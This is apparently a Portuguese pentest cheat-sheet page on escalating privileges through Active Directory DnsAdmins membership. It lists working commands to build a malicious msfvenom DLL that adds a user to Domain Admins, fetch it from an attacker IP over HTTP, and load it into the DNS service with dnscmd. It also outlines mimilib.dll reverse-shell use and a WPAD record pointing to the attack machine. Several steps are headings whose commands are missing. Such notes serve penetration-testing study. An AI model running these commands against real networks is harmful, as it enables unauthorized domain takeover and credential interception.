DnsAdmins

Os membros do grupo DnsAdminsarrow-up-right têm acesso às informações de DNS na rede.

Geração de DLL maliciosa

  • Podemos gerar uma DLL maliciosa para adicionar um usuário ao grupo domain admins usando msfvenom

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
  • Em seguida, inicie um servidor HTTP em Python

python3 -m http.server 7777
  • Faça o download do arquivo para o destino

wget "http://10.10.14.3:7777/adduser.dll" -outfile "adduser.dll"
  • Carregando DLL como membro do grupo DnsAdmins

Get-ADGroupMember -Identity DnsAdmins
  • Carregando DLL personalizada

dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll
  • Primeiro, precisamos do SID do nosso usuário

wmic useraccount where name="netadm" get sid
  • Verificando permissões no serviço DNS

sc.exe sdshow DNS
  • Interrompendo o serviço DNS

  • Iniciando o serviço DNS

  • Confirmação de participação no grupo

Confirmação da adição da chave de registro

  • O primeiro passo é confirmar se a ServerLevelPluginDllchave de registro existe. Até que nossa DLL personalizada seja removida, não conseguiremos iniciar o serviço DNS corretamente.

  • Podemos usar o reg deletecomando para remover a chave que aponta para nossa DLL personalizada.

  • Assim que isso for concluído, podemos iniciar o serviço DNS novamente.

  • Verificando o status do serviço DNS

Usando Mimilib.dll

Conforme detalhado nesta postagemarrow-up-right , também podemos utilizar o mimilib.dll,arrow-up-right fornecido pelo criador da Mimikatzferramenta, para obter execução de comandos, modificando o arquivo kdns.carrow-up-right para executar um comando reverso de uma linha ou outro comando de nossa escolha.

Desativar a lista de bloqueio de consultas globais

  • Para configurar esse ataque, primeiro desativamos a lista de bloqueio de consultas global:

Adicionando um registro WPAD

  • Em seguida, adicionamos um registro WPAD apontando para nossa máquina de ataque.

Last updated